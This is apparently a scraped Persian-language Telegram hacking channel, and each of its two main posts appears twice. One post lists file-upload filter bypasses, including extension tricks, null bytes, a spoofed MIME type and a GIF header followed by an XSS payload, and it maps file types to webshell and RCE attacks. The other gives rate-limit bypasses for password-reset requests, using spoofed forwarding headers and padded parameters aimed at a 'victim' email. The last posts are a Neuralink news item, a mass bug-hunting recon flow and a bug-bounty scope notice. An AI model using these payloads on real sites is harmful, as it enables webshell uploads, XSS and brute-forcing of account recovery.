نکاتی برای دور زدن محدودیدت آپلود فایل:
🔹 تغییر پسوند فایل ها
۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….
۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5
۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png
۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP
۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php
🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg
🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--
لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures
۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>
🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF
اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
🔹 تغییر پسوند فایل ها
۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….
۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5
۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png
۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP
۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php
🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg
🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--
لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures
۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>
🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF
اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
👌4😈2
برای دور زدن rate limit می توان از روش های زیر استفاده کرد:
۱- افزودن header های سفارشی زیر
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]
email=victim@gmail.com
۲- افزودن نال بایت (%00) و یا CLRF(%09, %0d, %0a) به انتهای مقدار پارامتر مورد نظر
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com%00
۳-تغییر IP یا کوکی ها یا user-agent
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]
email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]
email=victim@gmail.com
۴- افزودن مقدار تصادفی به انتهای endpoint
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
۵- افزودن space به انتهای مقدار پارامتر
مثال:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com"}
که به صورت زیر استفاده می شود:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com "}
۱- افزودن header های سفارشی زیر
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]
email=victim@gmail.com
۲- افزودن نال بایت (%00) و یا CLRF(%09, %0d, %0a) به انتهای مقدار پارامتر مورد نظر
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com%00
۳-تغییر IP یا کوکی ها یا user-agent
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]
email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]
email=victim@gmail.com
۴- افزودن مقدار تصادفی به انتهای endpoint
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com
۵- افزودن space به انتهای مقدار پارامتر
مثال:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com"}
که به صورت زیر استفاده می شود:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
{"email":"victim@gmail.com "}
👌3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
ایلان ماسک: تراشه جدید ما میتونه به افراد نابینا، قدرت بینایی بده.
💡 ایلان ماسک، مدیرعامل Neuralink در رویداد Show and Tell اعلام کرد که با تراشههای این شرکت میتوان به افراد با مشکلات بینایی کمک کرد و حتی بینایی را به افرادی که از ابتدا نابینا بودند هم برگرداند.
دانش و تکنولوژی (معجزه بشر) نابینایان رو بینا خواهد کرد.
نکته: آنها بینایی و ما بینش را با صیانت فراهم خواهیم کرد.
@matitanium
💡 ایلان ماسک، مدیرعامل Neuralink در رویداد Show and Tell اعلام کرد که با تراشههای این شرکت میتوان به افراد با مشکلات بینایی کمک کرد و حتی بینایی را به افرادی که از ابتدا نابینا بودند هم برگرداند.
دانش و تکنولوژی (معجزه بشر) نابینایان رو بینا خواهد کرد.
نکته: آنها بینایی و ما بینش را با صیانت فراهم خواهیم کرد.
@matitanium
Forwarded from Deleted Account
Forwarded from Deleted Account
asset discovery --> find ip(DNSX and etc...) --> cut cdn --> httpx --> check manually -> = easy vulnerablity 😈
یه فلو تویه mass hunting 😉
یه فلو تویه mass hunting 😉
😈1
Forwarded from Deleted Account
👍1
Deleted Account
Hi New Wide company join in bug bounty:D scope: *.tokensvc.com
تازه تازه همین الان اومد